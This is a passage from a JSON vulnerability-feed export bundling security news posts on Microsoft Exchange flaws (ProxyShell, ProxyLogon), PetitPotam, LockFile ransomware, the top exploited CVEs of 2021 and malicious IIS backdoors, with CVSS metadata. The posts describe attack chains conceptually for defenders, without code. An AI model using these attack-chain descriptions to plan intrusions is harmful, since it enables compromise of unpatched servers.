This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>), although it may have been muffled by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full-blown network-wide ransomware infection we ought to tell you more about PetitPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. 
MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. 
This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! 
Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. 
This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. 
Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). 
[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. 
[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the 4 CVEs, we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately, it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. 
The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. 
And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. 
A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near-perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspecting eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The backdoor code itself is hard to recognize as malicious, which also makes it hard to determine its origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. 
ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft team describes a custom IIS backdoor called FinanceSvcModel.dll, which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential-stealing modules monitor for specific requests that indicate sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prices and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. 
A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several things you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS server suite.\n * Deploy a backup strategy that creates regular backups that are easy to restore when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2021-12-10T15:20:04", "description": "# Exchange_IOC_Hunter\n\n#### Description:\n\nHunt for IOCs in IIS L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T10:36:44", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26855"], "modified": "2021-03-17T10:22:07", "id": "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-15T01:18:31", "description": "### This project has been discontinued\n\nPlease use Microsoft too...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-05T08:22:07", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-26857", "CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-02-14T23:14:09", "id": "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:20", "description": "\n\nThe software giant typically releases security updates on the second Tuesday of each month, but it occasionally deviates from that schedule when addressing active attacks that target newly identified and 
serious vulnerabilities in its products.\n\nThe patches released today fix security problems in **Microsoft Exchange Server 2013**, **2016** and **2019**. Microsoft said its **Exchange Online** service -- basically hosted email for businesses -- is not impacted by these flaws.\n\nMicrosoft credited researchers at Reston, Va. based [Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) for reporting the attacks. Volexity **President Steven Adair** told KrebsOnSecurity it first spotted the attacks on Jan. 6, 2021.\n\nAdair said while the exploits used by the group may have taken great skills to develop, they require little technical know-how to use and can give an attacker easy access to all of an organization's email if their vulnerable Exchange Servers are directly exposed to the Internet.\n\n"These flaws are very easy to exploit," Adair said. "You don't need any special knowledge with these exploits. You just show up and say 'I would like to break in and read all their email.' That's all there is to it."\n\nMicrosoft says the flaws are being used by a previously unknown Chinese espionage group that's been dubbed "**Hafnium**," which is known to launch its attacks using hosting companies based in the United States.\n\n"Hafnium primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs," Microsoft said. "HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers. 
Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA."\n\nAccording to Microsoft, Hafnium attackers have been observed combining all four zero-day flaws to target organizations running vulnerable Exchange Server products.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a "server-side request forgery" (SSRF) flaw, in which a server (in this case, an on-premises Exchange Server) can be tricked into running commands that it should never have been permitted to run, such as authenticating as the Exchange server itself.\n\nThe attackers used [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) to run code of their choice under the "system" account on a targeted Exchange server. The other two zero-day flaws -- [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) -- could allow an attacker to write a file to any part of the server.\n\nAfter exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised server, Microsoft said. Web shells are essentially software backdoors that allow attackers to steal data and perform additional malicious actions that lead to further compromise.\n\nNeither Microsoft nor Volexity is aware of publicly available code that would allow other cybercriminals to exploit these Exchange vulnerabilities. But given that these attacks are in the wild now, it may only be a matter of days before exploit code is publicly available online.\n\nMicrosoft stressed that the exploits detailed today were in no way connected to the [separate SolarWinds-related attacks](<https://krebsonsecurity.com/?s=solar+winds&x=0&y=0>). 
"We continue to see no evidence that the actor behind SolarWinds discovered or exploited any vulnerability in Microsoft products and services," the company said.\n\nFurther reading:\n\n[Microsoft's writeup on new Hafnium nation state cyberattacks](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>)\n\n[Microsoft technical advisory on the four Exchange Server flaws](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:19:17", "type": "krebs", "title": "Microsoft: Chinese Cyberspies Used 4 Exchange Server Flaws to Plunder Emails", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:19:17", "id": "KREBS:65D25A653F7348C7F18FFD951447B275", "href": "https://krebsonsecurity.com/2021/03/microsoft-chinese-cyberspies-used-4-exchange-server-flaws-to-plunder-emails/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": 
"2021-03-29T14:27:27", "description": "### Introduction\n\nOn 2 March 2021, [Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and [Veloxity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) produced disclosures outlining the discovery of four zero day vulnerabilities affecting multiple versions of Microsoft Exchange Server. Each of the vulnerabilities have been attributed a severity rating from high to critical, however the most impactful statement from both Microsoft and Veloxity was that these vulnerabilities formed an attack chain which was being actively exploited in the wild.\n\nSince the publication of these disclosures, details have emerged regarding the observed source of the exploitation of these vulnerabilities. The attacks are being widely attributed to the state-sponsored group dubbed Hafnium, [alleged](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) to be operating out of China.\n\nThe most notable of the new CVEs, [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), is a SSRF vulnerability in Microsoft Exchange which allows an attacker to induce the server into performing \u201cunintended actions\u201d through the use of a series of specially crafted POST requests. The attacker can leverage this vulnerability to exploit the other CVEs to perform malicious actions, such as dump 